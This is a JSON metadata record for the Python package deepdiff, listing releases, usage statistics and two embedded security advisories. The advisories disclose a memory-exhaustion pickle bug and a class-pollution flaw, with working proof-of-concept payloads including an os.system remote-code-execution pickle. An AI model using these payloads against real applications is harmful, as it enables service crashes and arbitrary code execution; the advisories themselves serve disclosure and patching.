"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.1.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sepe
rman%2Fdeepdiff/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"fc836f7a0a7afe4d07220fe33c97e30f792a29ba","kind":"tag","published_at":"2016-08-08T08:22:07.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.1.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.0/manifests"},{"name":"v1.5.0","sha":"f021f517e52d4230d245cb6d1b994c2184f02e6a","kind":"tag","published_at":"2016-07-02T01:40:54.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v1.5.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.5.0/manifests"},{"name":"v1.2.0","sha":"b9ce621ad237842b762e178c2fdd70042f235de8","kind":"tag","published_at":"2016-06-12T02:19:38.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v1.2.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.2.0/manifests"},{"name":"v1.0.1","sha":"8d1267e9df7faf439eea0662be493a333b40beda","kind":"tag","published_at":"2016-03-15T20:49:45.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v1.0.1","html_url":"htt
ps://github.com/seperman/deepdiff/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v1.0.1/manifests"},{"name":"v0.6.1","sha":"10c0debca3649ff9a4ac2fffea7fad596e5e97a0","kind":"tag","published_at":"2015-12-14T00:36:11.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v0.6.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.6.1/manifests"},{"name":"v0.5.6","sha":"3f09562b6e78facb7bac82dbbe9dbcb0b9e22768","kind":"tag","published_at":"2015-08-11T23:12:36.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v0.5.6","html_url":"https://github.com/seperman/deepdiff/releases/tag/v0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.6/manifests"},{"name":"v0.5.5","sha":"6e92f46827739b5517cc47b24cc16f672805a669","kind":"tag","published_at":"2015-07-26T07:58:25.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v0.5.5","html_url":"https://github.com/seperman/deepdiff/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v0.5.5/manifests"}]},"repo_metadata_updated_at":
"2024-09-08T01:57:42.517Z","dependent_packages_count":378,"downloads":78190666,"downloads_period":"last-month","dependent_repos_count":2058,"rankings":{"downloads":0.06687524905605291,"dependent_repos_count":0.24354141585584874,"dependent_packages_count":0.0718387968975113,"stargazers_count":1.646970623631306,"forks_count":3.6515717935313323,"docker_downloads_count":0.08289091949712842,"average":0.9606147997448633},"purl":"pkg:pypi/deepdiff","advisories":[{"uuid":"GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J","url":"https://github.com/advisories/GHSA-54jj-px8x-5w5q","title":"DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT","description":"### Summary\n\nThe pickle unpickler `_RestrictedUnpickler` validates which classes can be loaded but does not limit their constructor arguments. A few of the types in `SAFE_TO_IMPORT` have constructors that allocate memory proportional to their input (`builtins.bytes`, `builtins.list`, `builtins.range`). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call `pickle_load` with untrusted data.\n\n### Details\n\nCVE-2025-58367 hardened the delta class against pollution and remote code execution by converting `SAFE_TO_IMPORT` to a `frozenset` and blocking traversal. `_RestrictedUnpickler.find_class` only gates which classes can be loaded. It doesn't intercept `REDUCE` opcodes or validate what is passed to constructors.\n\nIt can be exploited in 2 ways.\n\n**1 - During `pickle_load`**\n\nA pickle that calls `bytes(N)` using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. 
The restricted unpickler does not override `load_reduce` so any allowed class can be called.\n\n```\nGLOBAL builtins.bytes      (passes find_class check — serialization.py:353)\nINT    10000000000          (10 billion)\nTUPLE + REDUCE             → bytes(10**10) → allocates ~9.3 GB\n```\n\n**2 - During delta application**\n\nA valid diff dict that first sets a value to a large int via `values_changed`, then converts it to bytes via `type_changes`. It works because `_do_values_changed()` runs before `_do_type_changes()` in `Delta.add()` in `delta.py` line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls `new_type(current_old_value)` at `delta.py` line 576 with no size guard.\n\n### PoC\n\nThe script uses Python's `resource` module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change `10**8` to `10**10` for the full 9.3 GB allocation.\n\n```python\nimport resource\nimport sys\n\ndef limit_memory(maxsize_mb):\n    \"\"\"Cap virtual memory for this process.\"\"\"\n    soft, hard = resource.getrlimit(resource.RLIMIT_AS)\n    maxsize_bytes = maxsize_mb * 1024 * 1024\n    try:\n        resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard))\n        print(f\"[*] Memory limit set to {maxsize_mb} MB\")\n    except ValueError:\n        print(\"[!] 
Failed to set memory limit.\")\n        sys.exit(1)\n\n# Load heavy imports before enforcing the limit\nfrom deepdiff import Delta\nfrom deepdiff.serialization import pickle_dump, pickle_load\n\nlimit_memory(1024)\n\n# --- Delta application path ---\npayload_dict = {\n    'values_changed': {\"root['x']\": {'new_value': 10**8}},\n    'type_changes': {\"root['x']\": {'new_type': bytes}},\n}\n\npayload1 = pickle_dump(payload_dict)\nprint(f\"Payload size: {len(payload1)} bytes\")\n\ntarget = {'x': 'anything'}\ntry:\n    result = target + Delta(payload1)\n    print(f\"Allocated: {len(result['x']) // 1024 // 1024} MB\")\n    print(f\"Amplification: {len(result['x']) // len(payload1)}x\")\nexcept MemoryError:\n    print(\"[!] MemoryError — payload tried to allocate too much\")\n\n# --- Raw pickle path ---\npayload2 = (\n    b\"(dp0\\n\"\n    b\"S'_'\\n\"\n    b\"cbuiltins\\nbytes\\n\"\n    b\"(I100000000\\n\"\n    b\"tR\"\n    b\"s.\"\n)\n\nprint(f\"Payload size: {len(payload2)} bytes\")\ntry:\n    result2 = pickle_load(payload2)\n    print(f\"Allocated: {len(result2['_']) // 1024 // 1024} MB\")\nexcept MemoryError:\n    print(\"[!] MemoryError — payload tried to allocate too much\")\n```\n\nOutput:\n```\n[*] Memory limit set to 1024 MB\nPayload size: 123 bytes\nAllocated: 95 MB\nAmplification: 813008x\nPayload size: 42 bytes\nAllocated: 95 MB\n```\n\n### Impact\n\nDenial of service. Any application that deserializes delta objects or calls `pickle_load` with untrusted inputs can be crashed with a small payload. The restricted unpickler is meant to make this safe. It prevents remote code execution but doesn't prevent resource exhaustion.\n\nThe amplification is large. 
800,000x for delta and 2,000,000x for raw pickle.\n\nImpacted users are anyone who accepts serialized delta objects from untrusted sources — network APIs, file uploads, message queues, etc.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-18T20:10:08.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q","https://nvd.nist.gov/vuln/detail/CVE-2026-33155","https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb","https://github.com/advisories/GHSA-54jj-px8x-5w5q"],"source_kind":"github","identifiers":["GHSA-54jj-px8x-5w5q","CVE-2026-33155"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-18T21:00:11.195Z","updated_at":"2026-04-18T03:00:45.880Z","epss_percentage":0.00052,"epss_percentile":0.16324,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J","packages":[{"ecosystem":"pypi","package_name":"deepdiff","versions":[{"first_patched_version":"8.6.2","vulnerable_version_range":"\u003e= 5.0.0, \u003c= 8.6.1"}],"purl":"pkg:pypi/deepdiff"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NGpqLXB4OHgtNXc1cc4ABT1J/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2","url":"https://github.com/advisories/GHSA-mw26-5g2v-hqw3","title":"DeepDiff Class Pollution in Delta class leading to DoS, Remote Code Execution, and more","description":"### Summary\n[Python class pollution](https://blog.abdulrah33m.com/prototype-pollution-in-python/) is a novel vulnerability categorized under [CWE-915](https://cwe.mitre.org/data/definitions/915.html). 
The `Delta` class is vulnerable to class pollution via its constructor, and when combined with a gadget available in DeepDiff itself, it can lead to Denial of Service and Remote Code Execution (via insecure [Pickle](https://docs.python.org/3/library/pickle.html) deserialization).\n\nThe gadget available in DeepDiff allows `deepdiff.serialization.SAFE_TO_IMPORT` to be modified to allow dangerous classes such as `posix.system`, and then perform insecure Pickle deserialization via the Delta class. This potentially allows any Python code to be executed, given that the input to `Delta` is user-controlled.\n\nDepending on the application where DeepDiff is used, this can also lead to other vulnerabilities. For example, in a web application, it might be possible to bypass authentication via class pollution.\n\n### Details\n\nThe `Delta` class can take different object types as a parameter in its constructor, such as a `DeepDiff` object, a dictionary, or even just bytes (that are deserialized via Pickle).\n\nWhen it takes a dictionary, it is usually in the following format:\n```py\nDelta({\"dictionary_item_added\": {\"root.myattr['foo']\": \"bar\"}})\n```\n\nTrying to apply class pollution here does not work, because there is already a filter in place: https://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/path.py#L23\n\nHowever, this code only runs when parsing the path from a string.\nThe `_path_to_elements` function helpfully returns the given input if it is already a list/tuple:\nhttps://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/path.py#L52-L53\n\nThis means that it is possible to pass the path as the internal representation used by Delta, bypassing the filter:\n\n```py\nDelta(\n    {\n        \"dictionary_item_added\": {\n            (\n                (\"root\", \"GETATTR\"),\n                (\"__init__\", \"GETATTR\"),\n                (\"__globals__\", \"GETATTR\"),\n                
(\"PWNED\", \"GET\"),\n            ): 1337\n        }\n    },\n)\n```\n\nGoing back to the possible inputs of `Delta`, when it takes a `bytes` as input, it uses pickle to deserialize them.\nCare was taken by DeepDiff to prevent arbitrary code execution via the `SAFE_TO_IMPORT` allow list.\nhttps://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/serialization.py#L62-L98\nHowever, using the class pollution in the `Delta`, an attacker can add new entries to this `set`.\n\nThis then allows a second call to `Delta` to [unpickle an insecure class](https://davidhamann.de/2020/04/05/exploiting-python-pickle/) that runs `os.system`, for example.\n\n#### Using dict\n\nUsually, class pollution [does not work](https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca#technical-details) when traversal starts at a `dict`/`list`/`tuple`, because it is not possible to reach `__globals__` from there.\nHowever, using two calls to `Delta` (or just one call if the target dictionary that already contains at least one entry) it is possible to first change one entry of the dictionary to be of type `deepdiff.helper.Opcode`, which then allows traversal to `__globals__`, and notably `sys.modules`, which in turn allows traversal to any module already loaded by Python.\nPassing `Opcode` around can be done via pickle, which `Delta` will happily accept given it is in the default allow list.\n\n### Proof of Concept\n\nWith deepdiff 8.6.0 installed, run the following scripts for each proof of concept.\nAll input to `Delta` is assumed to be user-controlled.\n\n#### Denial of Service\n\nThis script will pollute the value of `builtins.int`, preventing the class from being used and making code crash whenever invoked.\n\n```py\n# ------------[ Setup ]------------\nimport pickle\n\nfrom deepdiff.helper import Opcode\n\npollute_int = pickle.dumps(\n    {\n        \"values_changed\": {\"root['tmp']\": {\"new_value\": Opcode(\"\", 0, 0, 0, 0)}},\n        
\"dictionary_item_added\": {\n            (\n                (\"root\", \"GETATTR\"),\n                (\"tmp\", \"GET\"),\n                (\"__repr__\", \"GETATTR\"),\n                (\"__globals__\", \"GETATTR\"),\n                (\"__builtins__\", \"GET\"),\n                (\"int\", \"GET\"),\n            ): \"no longer a class\"\n        },\n    }\n)\n\n\nassert isinstance(pollute_int, bytes)\n\n# ------------[ Exploit ]------------\n# This could be some example, vulnerable, application.\n# The inputs above could be sent via HTTP, for example.\n\nfrom deepdiff import Delta\n\n# Existing dictionary; it is assumed that it contains\n# at least one entry, otherwise a different Delta needs to be\n# applied first, adding an entry to the dictionary.\nmydict = {\"tmp\": \"foobar\"}\n\n# Before pollution\nprint(int(\"41\") + 1)\n\n# Apply Delta to mydict\nresult = mydict + Delta(pollute_int)\n\nprint(int(\"1337\"))\n```\n\n```shell\n$ python poc_dos.py\n42\nTraceback (most recent call last):\n  File \"/tmp/poc_dos.py\", line 43, in \u003cmodule\u003e\n    print(int(\"1337\"))\nTypeError: 'str' object is not callable\n```\n\n#### Remote Code Execution\n\nThis script will create a file at `/tmp/pwned` with the output of `id`.\n\n```py\n# ------------[ Setup ]------------\nimport os\nimport pickle\n\nfrom deepdiff.helper import Opcode\n\npollute_safe_to_import = pickle.dumps(\n    {\n        \"values_changed\": {\"root['tmp']\": {\"new_value\": Opcode(\"\", 0, 0, 0, 0)}},\n        \"set_item_added\": {\n            (\n                (\"root\", \"GETATTR\"),\n                (\"tmp\", \"GET\"),\n                (\"__repr__\", \"GETATTR\"),\n                (\"__globals__\", \"GETATTR\"),\n                (\"sys\", \"GET\"),\n                (\"modules\", \"GETATTR\"),\n                (\"deepdiff.serialization\", \"GET\"),\n                (\"SAFE_TO_IMPORT\", \"GETATTR\"),\n            ): set([\"posix.system\"])\n        },\n    }\n)\n\n\n# From 
https://davidhamann.de/2020/04/05/exploiting-python-pickle/\nclass RCE:\n    def __reduce__(self):\n        cmd = \"id \u003e /tmp/pwned\"\n        return os.system, (cmd,)\n\n\n# Wrap object with dictionary so that Delta does not crash\nrce_pickle = pickle.dumps({\"_\": RCE()})\n\nassert isinstance(pollute_safe_to_import, bytes)\nassert isinstance(rce_pickle, bytes)\n\n# ------------[ Exploit ]------------\n# This could be some example, vulnerable, application.\n# The inputs above could be sent via HTTP, for example.\n\nfrom deepdiff import Delta\n\n# Existing dictionary; it is assumed that it contains\n# at least one entry, otherwise a different Delta needs to be\n# applied first, adding an entry to the dictionary.\nmydict = {\"tmp\": \"foobar\"}\n\n# Apply Delta to mydict\nresult = mydict + Delta(pollute_safe_to_import)\n\nDelta(rce_pickle)  # no need to apply this Delta\n```\n\n```shell\n$ python poc_rce.py\n$ cat /tmp/pwned\nuid=1000(dtc) gid=100(users) groups=100(users),1(wheel)\n```\n\n### Who is affected?\n\nOnly applications that pass (untrusted) user input directly into `Delta` are affected.\n\nWhile input in the form of `bytes` is the most flexible, there are certainly other gadgets, depending on the application, that can be used via just a dictionary. This dictionary could easily be parsed, for example, from JSON. 
One simple example would be overriding `app.secret_key` of a Flask application, which would allow an attacker to sign arbitrary cookies, leading to an authentication bypass.\n\n### Mitigations\n\nA straightforward mitigation is preventing traversal through private keys, like it is already done in the path parser.\nThis would have to be implemented in both `deepdiff.path._get_nested_obj` and `deepdiff.path._get_nested_obj_and_force`,\nand possibly in `deepdiff.delta.Delta._get_elements_and_details`.\nExample code that raises an error when traversing these properties:\n```py\nif elem.startswith(\"__\") and elem.endswith(\"__\"):\n  raise ValueError(\"traversing dunder attributes is not allowed\")\n```\n\nHowever, if it is desirable to still support attributes starting and ending with `__`, but still protect against this vulnerability, it is possible to only forbid `__globals__` and `__builtins__`, which stops the most serious cases of class pollution (but not all).\nThis was the solution adopted by pydash: 
https://github.com/dgilland/pydash/issues/180","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-09-03T22:25:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":10.0,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H","references":["https://github.com/seperman/deepdiff/security/advisories/GHSA-mw26-5g2v-hqw3","https://github.com/dgilland/pydash/issues/180","https://github.com/dgilland/pydash/commit/2015f0a4bcdbc3a5b27652e38fe97b3ee13ac15f","https://nvd.nist.gov/vuln/detail/CVE-2025-58367","https://github.com/seperman/deepdiff/commit/c69c06c13f75e849c770ade3f556cd16209fd183","https://github.com/seperman/deepdiff/releases/tag/8.6.1","https://github.com/advisories/GHSA-mw26-5g2v-hqw3"],"source_kind":"github","identifiers":["GHSA-mw26-5g2v-hqw3","CVE-2025-58367"],"repository_url":"https://github.com/seperman/deepdiff","blast_radius":33.13445370426414,"created_at":"2025-09-03T23:08:30.198Z","updated_at":"2026-04-18T03:02:11.321Z","epss_percentage":0.0019,"epss_percentile":0.40984,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2","packages":[{"ecosystem":"pypi","package_name":"deepdiff","versions":[{"first_patched_version":"8.6.1","vulnerable_version_range":"\u003e= 5.0.0, \u003c= 
8.6.0"}],"purl":"pkg:pypi/deepdiff"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tdzI2LTVnMnYtaHF3M84ABLo2/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/deepdiff","docker_dependents_count":538,"docker_downloads_count":817048902,"usage_url":"https://repos.ecosyste.ms/usage/pypi/deepdiff","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/deepdiff/dependencies","status":null,"funding_links":["https://github.com/sponsors/seperman","https://ko-fi.com/seperman"],"critical":true,"issue_metadata":{"last_synced_at":"2024-09-07T03:10:12.096Z","issues_count":136,"pull_requests_count":65,"avg_time_to_close_issue":9239475.119565217,"avg_time_to_close_pull_request":1260139.796875,"issues_closed_count":92,"pull_requests_closed_count":64,"pull_request_authors_count":32,"issue_authors_count":117,"avg_comments_per_issue":2.948529411764706,"avg_comments_per_pull_request":2.0307692307692307,"merged_pull_requests_count":53,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":47,"past_year_pull_requests_count":28,"past_year_avg_time_to_close_issue":3162591.53125,"past_year_avg_time_to_close_pull_request":907900.1481481482,"past_year_issues_closed_count":32,"past_year_pull_requests_closed_count":27,"past_year_pull_request_authors_count":14,"past_year_issue_authors_count":36,"past_year_avg_comments_per_issue":1.8297872340425532,"past_year_avg_comments_per_pull_request":1.6785714285714286,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":22,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/issues","maintainers":[{"login":"seperman","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/seperman"}],"active_maintainers":[{"login":"seperman","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/seperman"}]},"versi
ons_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deepdiff/codemeta","maintainers":[{"uuid":"seperman","login":"seperman","name":null,"email":null,"url":null,"packages_count":6,"html_url":"https://pypi.org/user/seperman/","role":null,"created_at":"2022-11-14T21:11:15.001Z","updated_at":"2022-11-14T21:11:15.001Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/seperman/packages"}]}